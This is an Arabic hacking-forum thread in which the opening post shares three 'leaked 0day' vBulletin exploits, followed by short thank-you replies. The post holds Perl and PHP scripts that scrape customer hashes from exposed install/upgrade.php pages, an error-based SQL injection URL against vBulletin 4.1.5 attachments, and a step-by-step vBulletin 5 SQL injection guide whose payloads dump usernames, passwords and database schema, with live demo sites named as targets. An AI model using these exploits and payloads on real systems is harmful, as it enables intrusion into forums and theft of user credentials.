1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : سلطان القلوب | المشاهدات : 2,878 | الردود : 6
الوسوم:
حالة الموضوع:
مغلق
  1. سلطان القلوب DeveloPer Plus

    الأنتساب:
    ‏2 نوفمبر 2012
    المشاركات:
    19
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    15
    الإقامة:
    D Z
    [​IMG]


    اخواني الكرام كيف حالك ان شاء الله بخير تكونو ياربي

    ثلالث ثغرات تم تسريبها من قبل المبدع The Injector

    vBulletin x.x.x Customer Area 0day



    كود PHP:
    vBulletin x.x.x Customer Area 0day
    Perl script got  leaked  so decided to post the perl script here

    Code:
    #!/usr/bin/perl

    use LWP::UserAgent;
    use HTTP::Request::Common;


    system('cls');
    system('title vBulletin Install Auto Exploiter');
    print "\n ---------------------------------------";
    print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
    print " ---------------------------------------\n";
    print " + d4tabase.com -+- d4tabase.com + ";
    print "\n ---------------------------------------\n";
    print " coded by n0tch shoutz d4tabase crew ";
    print "\n ---------------------------------------\n";


    if($#ARGV == -1 or $#ARGV > 0)
    {
    print "\n usage: ./vBulletin.pl domain (without http://) \n\n";
    exit;
    }


    $domain = $ARGV[0];
    $install_dir = "install";
    $full_domain = "http://$domain/$install_dir/upgrade.php";
    chop($domain);


    &search;




    sub search
    {
    $url = $full_domain;
    $lwp = LWP::UserAgent->new();
    $lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
    $request = $lwp->post($url, ["searchHash" => "Search"]);


    print " Searching $domain ----\n ";
    if ($request->content =~ /CUSTNUMBER = \"(.+)\";/)
    {
    print "Result : $1\n";
    } else {
    print "Hash: Hash not found!\n";
    }
    }






    php exploit -
    --------------------


    <?php
    set_time_limit
    (0);


    if(
    $argc 2) {
        echo 
    "Usage: {$argv[0]} http://site.ru/forum" PHP_EOL;
        exit;
    }


    $URL $argv[1];
    $arr parse_url($URL);


    ### work with url
    if(strpos($URL'?')) die("Ohh, your URL is not valid");
    if(
    substr($URL, -11) != '/'$URL $URL '/';
    if(!
    $arr['scheme']) $URL 'http://' $URL;


    $headers get_headers($URL '/install/upgrade.php');
    if(
    substr($headers[0], 93) == '200') {
        
    $source file_get_contents($URL "/install/upgrade.php");
    }
    elseif(
    $headers get_headers($URL '/install/finalupgrage.php')) {
        if(
    substr($headers[0], 93) == '200'$source file_get_contents($URL "/install/finalupgrage.php");
    }
    else die(
    "something went wrong...");


    preg_match_all('|var CUSTNUMBER = "(.*?)";|'$source$res);
    foreach (
    $res[1] as $hash) {
        echo 
    "Hash: " $hash PHP_EOL;
        
    $fp fopen("hash.txt""a+");
        
    fwrite($fp$hash PHP_EOL);
    }
    ?>



    vbulletin 4.1.5 attachment SQLI 0day




    كود PHP:
    vbulletin 4.1.5 attachment SQLI
    examine variables came across sq
    -injection, as later found to be inherent to all vbulletin 4.1.5TitleVulnerability in vBulletin 4.1.5 DorkPowered by Powered by vBulletin 4.1.5 ConditionsThe account on the forumPermission to attach files to messages themes (attachmentsRegister -> go to the forum -> click a topic or if the board isyou can choose to create an article (the second option more work) -> at the bottom looking Attachments 'Manage Attachments' - > Open the window and setting "values ​​[f]" insert our SQL queryExample:

    Code:
    http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1
    After thatwe see the standard error of the database offlinethus opening the source code of the page and see:


    Code:
    <! -  
    Database error in vBulletin 4.1.5 :  

    Invalid SQL :  

                 
    SELECT  
                     permissionsfrom 
    ,  Hidden ,  setpublish ,  publishdate ,  userid 
                 FROM ds23fSDdfsdf_cms_node  
                 WHERE  
                     nodeid  
    = - 1599  or ( ) = ( Select from Select name_const version () , ), name_const version (), )) );  

    MySQL Error    :  Duplicate column Name  .1.49-'5 '  
    Error Number   :  1060  
    Request Date   
    :  Tuesday ,  February 12th  2013   @  01 12 33 PM  
    Error Date     
    :  Tuesday ,  February 12th  2013   @  01 12 33  


    Address     
    :  127.0.0.1  
    Username       
    :  Hacker  
    Classname      
    :  vB_Database  
    MySQL Version  
    :   
    -> 

    vBulletin 5 SQL Injection




    كود PHP:
    vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day
    _ _ _ _ _____ _____ ___ _____ _ ______ 
    | | | | | | | | | | | |/ _  |_ _| (_) | ___
    | |
    _| | __ _ ___| | ___ _ __ _ _ __ __| | | |/' |_ _| |/' / /_  | |_ __ ___ _ __ _ _ __ | |_ ___ _ __ __ _ ___ 
    |/ _` |/ __| |/ / | | |/ _` | '__/ _` | | /| \ \/ / /| | _ | | | '__| |/ _` | '_ \| _/ _ \| '__/ _` |/ 
    | | | | (_| | (__| <| |_| | (_| | | | (_| |  |_/ /> < |_/ / | | | | | | | (_) | | (_| | | | | || (_) | | | (_| | __/
    _| |_/__,_|___|_|___, |__,_|___,____//_/\_\\___/\_| |_/ \_/_| \___/| |\__,_|_| |_\_| \___/|_| \__, |\___|
    __/ | _/ | __/ | 
    |
    ___/ |__/ |___
    ____ ____ __ _ ______ ____ ____ 
    _ __
    __ )__ __/ / /__ / /_(_)___ ____/ / __ __ ____ ___ __
    | | / / __ / / / / / / __/ / __  /___  / / / / / / / __ `/ / / /
    | |/ / /_/ / /_/ / / / __/ /_/ / / / / ____/ / / /_/ / /_/ / /_/ / /_/ / 
    |___/_____/\__,_/_/_/\___/\__/_/_/ /_/ /_____/ \____/_____/\__,_/\__, / 
    /____/

    ************************************************** ****************
    #Title: vBulletin 5 SQL Injection > Beta Whatever
    #Author: 0x0A
    #Date: Dec 11, 2012
    #Category: web application
    #Type: SQL Injection
    #Requirements: Firefox/Live HTTP Headers/
    #Software Link: http://www.vbulletin.com/purchases/
    http://www.vbulletin.com/features/
    #Homepage: hackyard.net
    ***********.com
    #Version: 5 and above(not older versions)
    #Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
    #Demo sites to try: http://www.sultantheme.com/vb5connectforum/
    http://vb5connect.com/bb/
    ************************************************** ****************



    -------------------------------------------------------------------
    -------------------------------------------------------------------
    How to
    -------------------------------------------------------------------
    -------------------------------------------------------------------


    -------------------------------------------------------------------
    ================================================== =================
    -------------------------------------------------------------------
    [#1] First of all, make an account to the vBulletin 5 forum,

    http://img402.imageshack.us/img402/7784/69376730.png
    -------------------------------------------------------------------
    ================================================== =================
    -------------------------------------------------------------------



    -------------------------------------------------------------------
    ================================================== =================
    -------------------------------------------------------------------
    [#2] After that, go to any topic and open Live HTTP Headers (https://addons.mozilla.org/en-us/fir...-http-headers/)

    http://imageshack.us/a/img12/305/89268702.png
    -------------------------------------------------------------------
    ================================================== =================
    -------------------------------------------------------------------


    -------------------------------------------------------------------
    ================================================== =================
    -------------------------------------------------------------------
    [#3] After that click the Like button, you will receive almost the same result as me. Go to the first POST record as the picture below and click Replay button,

    http://imageshack.us/a/img707/9990/68621087.png
    -------------------------------------------------------------------
    ================================================== =================
    -------------------------------------------------------------------


    -------------------------------------------------------------------
    ================================================== =================
    -------------------------------------------------------------------
    [#4] Then, on Send POST Content use this:

    -------------------------------------------------------------------------------------------------------------------------------------------------------------------
    nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
    -------------------------------------------------------------------------------------------------------------------------------------------------------------------

    http://imageshack.us/a/img42/1590/26447606.png

    //Note that to keep the noteid value as it was as default in the POST Content. Instead you
    `ll get invalid noteid error.
    The following SQLi command will fetch out the first record from user table(username/password).
    -------------------------------------------------------------------
    ================================================== =================
    -------------------------------------------------------------------




    -------------------------------------------------------------------
    ================================================== =================
    -------------------------------------------------------------------
    [
    #Other SQLi Syntaxes]

    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    |
    Version():
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+



    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    |
    User():
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+



    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    |
    Database():
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+


    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    |
    Database Print:
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7eFROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+



    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    |
    Table Count:
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7eFROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+



    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    |Print 
    Tables:
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7eFROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+



    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    |
    Columns of selected table:
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7eFROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+



    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    |
    Fetch Out Data:
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
    nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7eFROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
    +------------------------------------------------------------------------------------------------------------------------------------------------------------------+

    -------------------------------------------------------------------
    ================================================== =================
    -------------------------------------------------------------------

    |
     
    ' /
    -- (*) --
    >*<
    >0<@<
    >>>@<<*
    >@>*<0<<<
    >*>>@<<<@<<
    >@>>0<<<*<<@<
    >*>>0<<@<<<@<<<
    >@>>*<<@<>*<<0<*<
    \*/ >0>>*<<@<>0><<*<@<<
    ___\\U//___ >*>>@><0<<*>>@><*<0<<
    |\\ | | \\| >@>>0<*<0>>@<<0<<<*<@<< 
    | \\| | _(UU)_ >((*))_>0><*<0><@<<<0<*<
    |\ \| || / //||.*.*.*.|>>@<<*<<@>><0<<<
    Merry Xmas |\\_|_|&&_// ||*.*.*.*|_\\db//_ 
    """"|'
    .'.'.|~~|.*.*.*| ____|_
    |'.'.'.|  |____|>>>>>>|
    ~~~~~~~~ '""""
    `------'



    ----------------------------------------------------

    ==[ That
    `s it!
    ==[ 
    Thanks0x0A!
    ==[ 
    Romania

    ----------------------------------------------------  
    :{1}::{1}::{1}:​
     
  2. روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     
  3. ĦAML3Ŧ Developer

    الأنتساب:
    ‏18 يناير 2012
    المشاركات:
    19
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    هَنـآك .!
    رد: vbulletin 4.1.5 & vBulletin 5 & vBulletin x.x.x 0day

    مشكوور كتير يا غالى,
     
  4. يوسف العراقي Developer

    الأنتساب:
    ‏5 نوفمبر 2012
    المشاركات:
    57
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    العراق
    رد: vbulletin 4.1.5 & vBulletin 5 & vBulletin x.x.x 0day

    *:" Thank's
     
  5. سلطان القلوب DeveloPer Plus

    الأنتساب:
    ‏2 نوفمبر 2012
    المشاركات:
    19
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    15
    الإقامة:
    D Z
    رد: vbulletin 4.1.5 & vBulletin 5 & vBulletin x.x.x 0day

    لاشكر علي واجب

    لاهنت على المرور :{12}:
     
  6. سلطان القلوب DeveloPer Plus

    الأنتساب:
    ‏2 نوفمبر 2012
    المشاركات:
    19
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    15
    الإقامة:
    D Z
    رد: vbulletin 4.1.5 & vBulletin 5 & vBulletin x.x.x 0day

    You are welcome​
     
  7. Ĝυēναяα Developer

    الأنتساب:
    ‏21 يونيو 2012
    المشاركات:
    103
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    50
    الإقامة:
    فلسطين
    رد: vbulletin 4.1.5 & vBulletin 5 & vBulletin x.x.x 0day

    يع ـطيك الع ـافيه يا قلبو

    ما تح ـرمنا من ج ـديدك
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة